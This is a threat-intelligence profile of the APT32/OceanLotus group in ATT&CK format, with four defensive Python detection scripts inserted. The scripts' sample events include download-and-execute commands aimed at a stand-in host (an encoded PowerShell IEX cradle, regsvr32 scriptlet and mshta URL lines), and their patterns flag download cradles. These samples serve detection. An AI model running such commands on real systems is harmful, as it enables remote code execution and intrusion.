APT32

APT32 is a suspected Vietnam-based threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists, with a strong focus on Southeast Asian countries such as Vietnam, the Philippines, Laos, and Cambodia. It has made extensive use of strategic web compromises (watering-hole attacks) to infect victims.(Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: ESET OceanLotus)
ID: G0050
Associated Groups: BISMUTH, Canvas Cyclone, OceanLotus, APT-C-00, SeaLotus
Version: 3.0
Created: 14 Dec 2017
Last Modified: 17 Apr 2024

Associated Group Descriptions

Name Description
BISMUTH (Citation: Microsoft Threat Actor Naming July 2023)
Canvas Cyclone (Citation: Microsoft Threat Actor Naming July 2023)
OceanLotus (Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. Ocean Lotus February 2021)
APT-C-00 (Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. Ocean Lotus February 2021)
SeaLotus (Citation: Cybereason Oceanlotus May 2017)

Techniques Used

Domain ID Name Use
Enterprise T1087 .001 Account Discovery: Local Account

APT32 enumerated administrative users using the command `net localgroup administrators`.(Citation: Cybereason Cobalt Kitty 2017)

Enterprise T1583 .001 Acquire Infrastructure: Domains

APT32 has set up and operated websites to gather information and deliver malware.(Citation: Volexity Ocean Lotus November 2020)

.006 Acquire Infrastructure: Web Services

APT32 has set up Dropbox, Amazon S3, and Google Drive to host malicious downloads.(Citation: Volexity Ocean Lotus November 2020)

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

APT32 has used JavaScript that communicates over HTTP or HTTPS with attacker-controlled domains to download additional frameworks. The group has also downloaded encrypted payloads over HTTP.(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Cobalt Kitty 2017)

.003 Application Layer Protocol: Mail Protocols

APT32 has used email for C2 via an Office macro.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

APT32 established persistence using Registry Run keys, both to execute PowerShell and VBS scripts as well as to execute their backdoor directly.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

APT32 has used PowerShell-based tools, PowerShell one-liners, and shellcode loaders for execution.(Citation: FireEye APT32 May 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)

.003 Command and Scripting Interpreter: Windows Command Shell

APT32 has used cmd.exe for execution.(Citation: Cybereason Cobalt Kitty 2017)

.005 Command and Scripting Interpreter: Visual Basic

APT32 has used macros, COM scriptlets, and VBS scripts.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)

.007 Command and Scripting Interpreter: JavaScript

APT32 has used JavaScript for drive-by downloads and C2 communications.(Citation: Cybereason Cobalt Kitty 2017)(Citation: Volexity Ocean Lotus November 2020)

Enterprise T1543 .003 Create or Modify System Process: Windows Service

APT32 modified Windows services to ensure PowerShell scripts were loaded on the system. APT32 has also created a Windows service to establish persistence.(Citation: ESET OceanLotus)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)

Enterprise T1585 .001 Establish Accounts: Social Media Accounts

APT32 has set up Facebook pages in tandem with fake websites.(Citation: Volexity Ocean Lotus November 2020)

Enterprise T1048 .003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

APT32's backdoor can exfiltrate data by encoding it in the subdomain field of DNS packets.(Citation: ESET OceanLotus Mar 2019)
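The subdomain-field exfiltration described above can be hunted for in ordinary DNS query logs: the tell is one client sending many distinct, encoded-looking subdomains to one registered domain. The following is an added example, not APT32's code and not taken from the cited ESET analysis. The log format and the `<hex-chunk>.<sequence>.<domain>` label layout are assumptions chosen so the technique is visible; real implants vary the encoding, so the hex and entropy heuristics below are a starting point, not a signature.

```python
"""Hunt for data carried in DNS subdomain labels.

Added example, not APT32's code and not from the cited ESET analysis. The log
format and the <hex-chunk>.<sequence>.<domain> label layout are assumptions
made so that the technique is visible; real implants vary the encoding.
"""
import math
import re
from collections import defaultdict

# Constructed DNS query log: timestamp, client IP, queried name (not real traffic).
SAMPLE_DNS_LOG = """\
2024-01-10T09:00:01Z 10.0.0.5 www.example.com
2024-01-10T09:00:02Z 10.0.0.5 mail.example.com
2024-01-10T09:00:03Z 10.0.0.7 4a6f686e20446f65.0011.c2-hypothetical.test
2024-01-10T09:00:04Z 10.0.0.7 2c2041636d6520436f.0012.c2-hypothetical.test
2024-01-10T09:00:05Z 10.0.0.7 72702c2070617373.0013.c2-hypothetical.test
2024-01-10T09:00:06Z 10.0.0.5 cdn.example.com
"""

HEX_LABEL = re.compile(r"^[0-9a-f]{16,}$")


def shannon_entropy(text: str) -> float:
    """Bits per character: Base32/Base64 blobs score high, hostnames score low."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname: str, suffix_labels: int = 2):
    """Return (registered domain, subdomain labels). A fixed two-label suffix is
    an approximation; use a public-suffix list in production."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-suffix_labels:]), labels[:-suffix_labels]


def label_is_suspicious(label: str) -> bool:
    """Long hex runs or long high-entropy labels rarely occur in real hostnames."""
    if HEX_LABEL.match(label):
        return True
    return len(label) >= 20 and shannon_entropy(label) >= 3.5


def find_dns_exfil(log_text: str, min_unique: int = 3):
    """Group queries by (client, registered domain) and flag pairs that send at
    least `min_unique` distinct subdomains containing encoded-looking labels."""
    per_pair = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        _ts, client, qname = parts
        domain, subs = split_qname(qname)
        if any(label_is_suspicious(label) for label in subs):
            per_pair[(client, domain)].add(".".join(subs))
    return [
        {"client": client, "domain": domain, "unique_subdomains": len(subs)}
        for (client, domain), subs in sorted(per_pair.items())
        if len(subs) >= min_unique
    ]


def reassemble_hex_payload(log_text: str, domain: str) -> str:
    """Recover the carried bytes for one flagged domain, ordering chunks by the
    sequence label assumed in the sample layout."""
    chunks = {}
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        qdomain, subs = split_qname(parts[2])
        if qdomain == domain and len(subs) == 2 and HEX_LABEL.match(subs[0]):
            chunks[int(subs[1])] = bytes.fromhex(subs[0])
    return b"".join(chunks[seq] for seq in sorted(chunks)).decode("utf-8", "replace")


if __name__ == "__main__":
    for hit in find_dns_exfil(SAMPLE_DNS_LOG):
        print(hit)
        print("carried data:", reassemble_hex_payload(SAMPLE_DNS_LOG, hit["domain"]))
```

Because this channel rides on the resolver path, it works even when the host has no direct Internet access; the counter-measure is logging at the recursive resolver, not just at the egress proxy.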

Enterprise T1222 .002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification

APT32's macOS backdoor changes the permissions of the file it wants to execute to mode 755 (owner read/write/execute, everyone else read/execute).(Citation: ESET OceanLotus macOS April 2019)

Enterprise T1589 .002 Gather Victim Identity Information: Email Addresses

APT32 has collected e-mail addresses for activists and bloggers in order to target them with spyware.(Citation: Amnesty Intl. Ocean Lotus February 2021)

Enterprise T1564 .001 Hide Artifacts: Hidden Files and Directories

APT32's macOS backdoor hides the clientID file by calling chflags.(Citation: ESET OceanLotus macOS April 2019)

.003 Hide Artifacts: Hidden Window

APT32 has used the WindowStyle parameter to conceal PowerShell windows.(Citation: FireEye APT32 May 2017)(Citation: Cybereason Cobalt Kitty 2017)

.004 Hide Artifacts: NTFS File Attributes

APT32 used NTFS alternate data streams to hide their payloads.(Citation: Cybereason Cobalt Kitty 2017)

Enterprise T1574 .001 Hijack Execution Flow: DLL

APT32 ran legitimately-signed executables from Symantec and McAfee which load a malicious DLL. The group also side-loads its backdoor by dropping a library and a legitimate, signed executable (AcroTranscoder).(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)

Enterprise T1070 .001 Indicator Removal: Clear Windows Event Logs

APT32 has cleared select event log entries.(Citation: FireEye APT32 May 2017)

.004 Indicator Removal: File Deletion

APT32's macOS backdoor can receive a “delete” command.(Citation: ESET OceanLotus macOS April 2019)

.006 Indicator Removal: Timestomp

APT32 has used scheduled task raw XML with a backdated timestamp of June 2, 2016. The group has also set the creation time of the files dropped by the second stage of the exploit to match the creation time of kernel32.dll. Additionally, APT32 has used a random value to modify the timestamp of the file storing the clientID.(Citation: FireEye APT32 May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: ESET OceanLotus macOS April 2019)

Enterprise T1056 .001 Input Capture: Keylogging

APT32 has abused the PasswordChangeNotify function (the export that LSA calls in registered password filter DLLs) to monitor for and capture account password changes.(Citation: Cybereason Cobalt Kitty 2017)

Enterprise T1036 .003 Masquerading: Rename Legitimate Utilities

APT32 has moved and renamed pubprn.vbs to a .txt file to avoid detection.(Citation: Twitter ItsReallyNick APT32 pubprn Masquerade)

.004 Masquerading: Masquerade Task or Service

APT32 has used hidden or non-printing characters to help masquerade service names, such as appending a Unicode no-break space character to a legitimate service name. APT32 has also impersonated the legitimate Flash installer file name "install_flashplayer.exe".(Citation: FireEye APT32 May 2017)
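A no-break space appended to a legitimate service name is invisible in most consoles and GUIs, so a rogue "Spooler " sits next to the real "Spooler" unnoticed. The check below is an added example, not from the FireEye report: it scans an exported service inventory for characters outside printable ASCII or in suspicious Unicode categories, folds each name to what an analyst's eye sees, and reports names that collide with a known legitimate service. The inventory and the allow-list of expected names are constructed assumptions.

```python
"""Check Windows service names for hidden or non-printing characters that make a
rogue service look like a legitimate one.

Added example; the service inventory and the list of expected names are
constructed for illustration, not taken from the FireEye report.
"""
import unicodedata

# Constructed inventory as exported from a host: (service name, display name, binary path).
SAMPLE_SERVICES = [
    ("Spooler", "Print Spooler", r"C:\Windows\System32\spoolsv.exe"),
    ("Spooler\u00a0", "Print Spooler", r"C:\Users\Public\svc.exe"),        # trailing U+00A0
    ("W32Time", "Windows Time", r"C:\Windows\System32\svchost.exe -k LocalService"),
    ("W32\u200bTime", "Windows Time", r"C:\ProgramData\time.exe"),          # embedded U+200B
]

# Assumed allow-list of legitimate service names on the baseline image.
KNOWN_SERVICE_NAMES = ["Spooler", "W32Time", "wuauserv"]

# Unicode categories that never belong in a service name: separators other than a
# plain interior space, format/control characters, private-use and unassigned.
SUSPICIOUS_CATEGORIES = {"Zs", "Zl", "Zp", "Cf", "Cc", "Co", "Cn"}


def hidden_characters(name: str):
    """Return (index, code point, Unicode name) for every character that is
    outside printable ASCII or in a suspicious category."""
    hits = []
    for i, ch in enumerate(name):
        if ch == " " and 0 < i < len(name) - 1:
            continue  # an ordinary interior space is normal
        if not (0x20 <= ord(ch) <= 0x7E) or unicodedata.category(ch) in SUSPICIOUS_CATEGORIES:
            hits.append((i, f"U+{ord(ch):04X}", unicodedata.name(ch, "UNNAMED")))
    return hits


def normalize(name: str) -> str:
    """Fold a name to what the eye sees: NFKC, drop format characters, trim, casefold."""
    folded = unicodedata.normalize("NFKC", name)
    folded = "".join(ch for ch in folded if unicodedata.category(ch) != "Cf")
    return folded.strip().casefold()


def find_masquerading(services, known_names):
    """Flag services whose raw name carries hidden characters and whose folded
    name collides with a known legitimate service name."""
    known_folded = {normalize(n): n for n in known_names}
    findings = []
    for name, _display, path in services:
        hidden = hidden_characters(name)
        looks_like = known_folded.get(normalize(name))
        if hidden and looks_like and name != looks_like:
            findings.append({"name": name, "looks_like": looks_like, "hidden": hidden, "path": path})
    return findings


if __name__ == "__main__":
    for f in find_masquerading(SAMPLE_SERVICES, KNOWN_SERVICE_NAMES):
        print(f"{f['name']!r} masquerades as {f['looks_like']} via {f['hidden']} -> {f['path']}")
```

The same folding step catches a plain trailing space and zero-width characters, not only U+00A0; pair it with a binary-path check, since a "Spooler" that runs from a user-writable directory is suspicious on its own.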

.005 Masquerading: Match Legitimate Resource Name or Location

APT32 has renamed a NetCat binary to kb-10233.exe to masquerade as a Windows update. APT32 has also renamed a Cobalt Strike beacon payload to install_flashplayers.exe.(Citation: Cybereason Cobalt Kitty 2017)(Citation: Volexity Ocean Lotus November 2020)

Enterprise T1003 .001 OS Credential Dumping: LSASS Memory

APT32 used Mimikatz and customized versions of Windows Credential Dumper to harvest credentials.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)

Enterprise T1027 .010 Obfuscated Files or Information: Command Obfuscation

APT32 has used the `Invoke-Obfuscation` framework to obfuscate their PowerShell.(Citation: FireEye APT32 May 2017)(Citation: GitHub Invoke-Obfuscation)(Citation: Cybereason Cobalt Kitty 2017)
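The hidden-window trick described under Hide Artifacts and the Invoke-Obfuscation tradecraft described here both leave traces in the process command line, which is where a detection engineer starts. The triage routine below is an added example, not detection content from the cited reports: it decodes any `-EncodedCommand` argument (Base64 over UTF-16LE, which is how powershell.exe expects it), runs a small set of indicator patterns over the visible and decoded text, and scores the event. The sample events, the indicator list and the score weights are constructed assumptions.

```python
"""Triage PowerShell process-creation events for hidden windows, encoded
commands and Invoke-Obfuscation-style string tricks.

Added example; the events are constructed for illustration and the indicator
patterns and scoring thresholds are assumptions, not detection content from
the cited reports.
"""
import base64
import re


def encode_ps(script: str) -> str:
    """Build the -EncodedCommand argument the way powershell.exe expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str) -> str:
    return base64.b64decode(blob).decode("utf-16-le")


# Constructed process-creation events (as logged by Sysmon EID 1 or 4688): (pid, command line).
SAMPLE_EVENTS = [
    (4012, 'powershell.exe -NoProfile -Command "Get-Date"'),
    (4020, "powershell.exe -w hidden -nop -ep bypass -enc "
           + encode_ps('IEX (New-Object Net.WebClient).DownloadString("http://c2.invalid/a")')),
    (4033, "powershell.exe -WindowStyle Hidden -c \"&('{1}{0}' -f 'EX','I') ('Ne'+'w-Object')\""),
]

# powershell.exe accepts any unambiguous prefix of a switch, so match abbreviations too.
HIDDEN_WINDOW = re.compile(r"-w\w*\s+(?:h\w*|1)\b", re.I)                 # -WindowStyle Hidden, -w hidden, -w 1
ENCODED_CMD = re.compile(r"-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{16,})", re.I)  # -EncodedCommand, -enc, -ec, -e <b64>
INDICATORS = {
    "format_operator": re.compile(r"\{\d+\}.*-f\s"),                       # ('{1}{0}' -f 'EX','I')
    "string_concat": re.compile(r"['\"][^'\"]*['\"]\s*\+\s*['\"]"),         # 'Ne'+'w-Object'
    "backtick_in_token": re.compile(r"\w`\w"),                              # I`EX
    "char_cast": re.compile(r"\[char\]", re.I),                             # [char]73+[char]69
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|\bIEX\b|Invoke-Expression", re.I),
}
WEIGHTS = {"hidden_window": 2, "encoded": 1, "download_cradle": 2}   # everything else scores 1


def triage(cmdline: str) -> dict:
    """Decode any -EncodedCommand, run the indicators over the visible and the
    decoded text, and score the event (score >= 3 is flagged)."""
    result = {"hidden_window": bool(HIDDEN_WINDOW.search(cmdline)), "encoded": False,
              "decoded": None, "indicators": [], "score": 0, "suspicious": False}
    text = cmdline
    m = ENCODED_CMD.search(cmdline)
    if m:
        result["encoded"] = True
        try:
            result["decoded"] = decode_ps(m.group(1))
            text = cmdline + "\n" + result["decoded"]
        except (ValueError, UnicodeDecodeError):
            pass  # not valid Base64/UTF-16LE: scan only the visible command line
    result["indicators"] = [name for name, rx in INDICATORS.items() if rx.search(text)]
    score = WEIGHTS["hidden_window"] * result["hidden_window"] + WEIGHTS["encoded"] * result["encoded"]
    score += sum(WEIGHTS.get(name, 1) for name in result["indicators"])
    result["score"] = score
    result["suspicious"] = score >= 3
    return result


if __name__ == "__main__":
    for pid, cmd in SAMPLE_EVENTS:
        r = triage(cmd)
        print(pid, "SUSPICIOUS" if r["suspicious"] else "ok", r["score"], r["indicators"])
```

Scanning only the decoded text misses the third event, which never spells out `IEX` at all; that is exactly why the format-operator and concatenation patterns are there, and why script-block logging (Event ID 4104), which records the de-obfuscated script as PowerShell executes it, is the stronger source when it is available.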

.011 Obfuscated Files or Information: Fileless Storage

APT32's backdoor has stored its configuration in a registry key.(Citation: ESET OceanLotus Mar 2019)

.013 Obfuscated Files or Information: Encrypted/Encoded File

APT32 has performed code obfuscation, including encoding payloads using Base64 and using a framework called "Dont-Kill-My-Cat" (DKMC). APT32 also encrypts the library used for network exfiltration with AES-256 in CBC mode in their macOS backdoor.(Citation: FireEye APT32 May 2017)(Citation: GitHub Invoke-Obfuscation)(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: ESET OceanLotus macOS April 2019)

.016 Obfuscated Files or Information: Junk Code Insertion

APT32 includes garbage code to mislead anti-malware software and researchers.(Citation: ESET OceanLotus)(Citation: ESET OceanLotus Mar 2019)

Enterprise T1588 .002 Obtain Capabilities: Tool

APT32 has obtained and used tools such as Mimikatz and Cobalt Strike, and a variety of other open-source tools from GitHub.(Citation: FireEye APT32 May 2017)(Citation: Cybereason Oceanlotus May 2017)

Enterprise T1566 .001 Phishing: Spearphishing Attachment

APT32 has sent spearphishing emails with a malicious executable disguised as a document or spreadsheet.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: FireEye APT32 April 2020)(Citation: Amnesty Intl. Ocean Lotus February 2021)

.002 Phishing: Spearphishing Link

APT32 has sent spearphishing emails containing malicious links.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: FireEye APT32 April 2020)(Citation: Volexity Ocean Lotus November 2020)(Citation: Amnesty Intl. Ocean Lotus February 2021)

Enterprise T1598 .003 Phishing for Information: Spearphishing Link

APT32 has used malicious links to direct users to web pages designed to harvest credentials.(Citation: Volexity Ocean Lotus November 2020)

Enterprise T1021 .002 Remote Services: SMB/Windows Admin Shares

APT32 used the net utility to copy their tools to remote machines over Windows hidden administrative shares (such as ADMIN$ and C$) for execution.(Citation: Cybereason Cobalt Kitty 2017)

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

APT32 has used scheduled tasks to persist on victim systems.(Citation: FireEye APT32 May 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)

Enterprise T1505 .003 Server Software Component: Web Shell

APT32 has used Web shells to maintain access to victim websites.(Citation: Volexity OceanLotus Nov 2017)

Enterprise T1608 .001 Stage Capabilities: Upload Malware

APT32 has hosted malicious payloads in Dropbox, Amazon S3, and Google Drive for use during targeting.(Citation: Volexity Ocean Lotus November 2020)

.004 Stage Capabilities: Drive-by Target

APT32 has stood up websites containing numerous articles and content scraped from the Internet to make them appear legitimate, but some of these pages include malicious JavaScript to profile the potential victim or infect them via a fake software update.(Citation: Volexity Ocean Lotus November 2020)

Enterprise T1218 .005 System Binary Proxy Execution: Mshta

APT32 has used mshta.exe for code execution.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)

.010 System Binary Proxy Execution: Regsvr32

APT32 created a scheduled task that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory. The group has also used regsvr32 to run their backdoor.(Citation: ESET OceanLotus Mar 2019)(Citation: FireEye APT32 May 2017)(Citation: Cybereason Cobalt Kitty 2017)

.011 System Binary Proxy Execution: Rundll32

APT32 malware has used rundll32.exe to execute an initial infection process.(Citation: Cybereason Cobalt Kitty 2017)
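The three proxy-execution binaries above (mshta.exe, regsvr32.exe with a COM scriptlet, rundll32.exe) are signed Microsoft components, so the detection hinges on what they are asked to load and who launched them, not on the binary itself. The rules below are an added example, not detection content from the cited reports: regsvr32 loading a scriptlet (`/i:` with a URL or `.sct`, or `scrobj.dll`), mshta given a URL, a `javascript:`/`vbscript:` URI or a user-writable path, rundll32 loading a DLL from a user-writable path, and parent-process context for Office applications and the Schedule service (which launches tasks under svchost.exe). The events are constructed.

```python
"""Flag mshta.exe, regsvr32.exe and rundll32.exe invocations that match the
proxy-execution patterns described above.

Added example; the events are constructed for illustration and the rules are
assumptions made here, not detection content from the cited reports.
"""
import re

# Constructed process-creation events: (parent image, image, command line).
SAMPLE_EVENTS = [
    ("explorer.exe", "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
    ("svchost.exe", "regsvr32.exe", "regsvr32.exe /s /n /u /i:http://c2.invalid/x.sct scrobj.dll"),
    ("winword.exe", "mshta.exe", "mshta.exe http://c2.invalid/u.hta"),
    ("cmd.exe", "rundll32.exe", r"rundll32.exe C:\Users\Public\drop.dll,Start"),
    ("services.exe", "regsvr32.exe", r"regsvr32.exe /s C:\Program Files\Vendor\plugin.dll"),
]

URL = re.compile(r"\b(?:https?|ftp)://", re.I)
SCRIPT_URI = re.compile(r"\b(?:javascript|vbscript|about):", re.I)
USER_WRITABLE = re.compile(r"\\(?:Users|ProgramData|Temp|AppData|Public)\\", re.I)
SCRIPTLET = re.compile(r"/i:\S*(?:https?://|\.sct\b)|scrobj\.dll", re.I)   # regsvr32 COM scriptlet load
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def classify(parent: str, image: str, cmdline: str) -> list:
    """Return the names of the rules the event matches (empty list = not flagged by these rules)."""
    image, parent = image.lower(), parent.lower()
    hits = []
    if image == "regsvr32.exe" and SCRIPTLET.search(cmdline):
        hits.append("regsvr32_scriptlet")
    if image == "mshta.exe" and (URL.search(cmdline) or SCRIPT_URI.search(cmdline)
                                 or USER_WRITABLE.search(cmdline)):
        hits.append("mshta_remote_or_userpath")
    if image == "rundll32.exe" and (URL.search(cmdline) or USER_WRITABLE.search(cmdline)):
        hits.append("rundll32_userpath")
    # Context tags: only added when a content rule already fired, so they sharpen rather than widen.
    if hits and parent in OFFICE_APPS:
        hits.append("office_parent")         # macro-launched proxy execution
    if hits and parent == "svchost.exe":
        hits.append("service_host_parent")   # scheduled tasks start under the Schedule service's svchost.exe
    return hits


def triage_events(events):
    return [(parent, image, classify(parent, image, cmd)) for parent, image, cmd in events]


if __name__ == "__main__":
    for parent, image, rules in triage_events(SAMPLE_EVENTS):
        print(f"{parent:>13} -> {image:<13} {rules or 'ok'}")
```

The first and last events show why the rules key on arguments: rundll32 running a Control Panel applet from shell32.dll and regsvr32 silently registering a vendor DLL under Program Files are routine, and flagging every invocation of these binaries would bury the scriptlet and user-path cases that matter.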

Enterprise T1216 .001 System Script Proxy Execution: PubPrn

APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses.(Citation: Twitter ItsReallyNick Status Update APT32 PubPrn)

Enterprise T1569 .002 System Services: Service Execution

APT32's backdoor has used Windows services as a way to execute its malicious payload.(Citation: ESET OceanLotus Mar 2019)

Enterprise T1552 .002 Unsecured Credentials: Credentials in Registry

APT32 used Outlook Credential Dumper to harvest credentials stored in the Windows Registry.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)

Enterprise T1550 .002 Use Alternate Authentication Material: Pass the Hash

APT32 has used pass the hash for lateral movement.(Citation: Cybereason Cobalt Kitty 2017)

.003 Use Alternate Authentication Material: Pass the Ticket

APT32 successfully gained remote access by using pass the ticket.(Citation: Cybereason Cobalt Kitty 2017)

Enterprise T1204 .001 User Execution: Malicious Link

APT32 has lured targets to download a Cobalt Strike beacon by including a malicious link within spearphishing emails.(Citation: Cybereason Cobalt Kitty 2017)(Citation: Volexity Ocean Lotus November 2020)(Citation: Amnesty Intl. Ocean Lotus February 2021)

.002 User Execution: Malicious File

APT32 has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: FireEye APT32 April 2020)(Citation: Amnesty Intl. Ocean Lotus February 2021)

Enterprise T1078 .003 Valid Accounts: Local Accounts

APT32 has used legitimate local admin account credentials.(Citation: FireEye APT32 May 2017)

Software

ID Name References Techniques
S0039 Net (Citation: Cybereason Cobalt Kitty 2017) (Citation: Microsoft Net Utility) (Citation: Savill 1999) Domain Account, Local Account, Domain Groups, System Service Discovery, Network Share Discovery, Additional Local or Domain Groups, SMB/Windows Admin Shares, Local Account, Domain Account, System Network Connections Discovery, Local Groups, Network Share Connection Removal, Password Policy Discovery, Remote System Discovery, Service Execution, System Time Discovery
S1078 RotaJakiro (Citation: RotaJakiro 2021 netlab360 analysis) (Citation: netlab360 rotajakiro vs oceanlotus) Boot or Logon Initialization Scripts, Standard Encoding, Shared Modules, Match Legitimate Resource Name or Location, Symmetric Cryptography, Automated Collection, System Information Discovery, Native API, Deobfuscate/Decode Files or Information, Process Discovery, Exfiltration Over C2 Channel, Inter-Process Communication, Non-Standard Port, Unix Shell Configuration Modification, Non-Application Layer Protocol, Systemd Service, XDG Autostart Entries
S0100 ipconfig (Citation: Cybereason Cobalt Kitty 2017) (Citation: TechNet Ipconfig) System Network Configuration Discovery
S0099 Arp (Citation: Cybereason Cobalt Kitty 2017) (Citation: TechNet Arp) System Network Configuration Discovery, Remote System Discovery
S0108 netsh (Citation: Cybereason Cobalt Kitty 2017) (Citation: TechNet Netsh) Disable or Modify System Firewall, Proxy, Security Software Discovery, Netsh Helper DLL
S0156 KOMPROGO (Citation: FireEye APT32 May 2017) Windows Management Instrumentation, System Information Discovery, Windows Command Shell
S0585 Kerrdown (Citation: Amnesty Intl. Ocean Lotus February 2021) (Citation: Unit 42 KerrDown February 2019) Encrypted/Encoded File, Malicious File, Spearphishing Link, Spearphishing Attachment, DLL, System Information Discovery, Deobfuscate/Decode Files or Information, Lateral Tool Transfer, Visual Basic, Ingress Tool Transfer, Malicious Link, Compression
S0155 WINDSHIELD (Citation: FireEye APT32 May 2017) System Owner/User Discovery, System Information Discovery, Non-Application Layer Protocol, Query Registry, File Deletion, Custom Command and Control Protocol
S0157 SOUNDBITE (Citation: FireEye APT32 May 2017) DNS, System Information Discovery, Application Window Discovery, Modify Registry, File and Directory Discovery
S0154 Cobalt Strike (Citation: Amnesty Intl. Ocean Lotus February 2021) (Citation: Cybereason Cobalt Kitty 2017) (Citation: Cybereason Oceanlotus May 2017) (Citation: FireEye APT32 May 2017) (Citation: Unit 42 KerrDown February 2019) (Citation: Volexity Ocean Lotus November 2020) (Citation: Volexity OceanLotus Nov 2017) (Citation: cobaltstrike manual) Windows Management Instrumentation, Screen Capture, Rundll32, Standard Encoding, Keylogging, JavaScript, Bypass User Account Control, Sudo and Sudo Caching, Security Account Manager, DNS, Domain Account, Symmetric Cryptography, Windows Service, Domain Groups, SSH, System Service Discovery, Code Signing, Network Share Discovery, Application Layer Protocol, Native API, Data from Local System, Deobfuscate/Decode Files or Information, Process Injection, Timestomp, Reflective Code Loading, Scheduled Transfer, SMB/Windows Admin Shares, Protocol Tunneling, Browser Session Hijacking, Modify Registry, Windows Remote Management, LSASS Memory, Distributed Component Object Model, System Network Configuration Discovery, Office Template Macros, File and Directory Discovery, System Network Connections Discovery, Token Impersonation/Theft, Make and Impersonate Token, Process Discovery, Parent PID Spoofing, PowerShell, Multiband Communication, File Transfer Protocols, Local Groups, Disable or Modify Tools, Indicator Removal from Tools, Process Hollowing, Exploitation for Privilege Escalation, Obfuscated Files or Information, Exploitation for Client Execution, Asymmetric Cryptography, Non-Application Layer Protocol, Protocol or Service Impersonation, Query Registry, Data Transfer Size Limits, Domain Accounts, BITS Jobs, Domain Fronting, Python, Windows Command Shell, Web Protocols, Visual Basic, Remote System Discovery, Network Service Discovery, Software Discovery, Pass the Hash, Ingress Tool Transfer, Remote Desktop Protocol, Service Execution, Dynamic-link Library Injection, Internal Proxy, Custom Command and Control Protocol, Commonly Used Port, Local Accounts, Process Argument Spoofing
S0002 Mimikatz (Citation: Adsecurity Mimikatz Guide) (Citation: Cybereason Cobalt Kitty 2017) (Citation: Cybereason Oceanlotus May 2017) (Citation: Deply Mimikatz) (Citation: FireEye APT32 May 2017) Security Account Manager, LSA Secrets, Credentials from Password Stores, Security Support Provider, Rogue Domain Controller, Credentials from Web Browsers, Private Keys, LSASS Memory, Golden Ticket, Pass the Ticket, Steal or Forge Authentication Certificates, Account Manipulation, SID-History Injection, Silver Ticket, Windows Credential Manager, Pass the Hash, DCSync
S0352 OSX_OCEANLOTUS.D (Citation: Amnesty Intl. Ocean Lotus February 2021) (Citation: Backdoor.MacOS.OCEANLOTUS.F) (Citation: Trend Micro MacOS Backdoor November 2020) (Citation: TrendMicro MacOS April 2018) (Citation: Unit42 OceanLotus 2017) Standard Encoding, Linux and Mac File and Directory Permissions Modification, Shared Modules, Encrypted/Encoded File, Archive via Custom Method, Masquerade File Type, Symmetric Cryptography, System Checks, Gatekeeper Bypass, System Information Discovery, Data from Local System, Deobfuscate/Decode Files or Information, Archive via Library, Timestomp, Launch Daemon, System Network Configuration Discovery, Masquerade Task or Service, PowerShell, Unix Shell, Non-Standard Port, Non-Application Layer Protocol, Launch Agent, File Deletion, Software Packing, Web Protocols, Visual Basic, Ingress Tool Transfer, Hidden Files and Directories
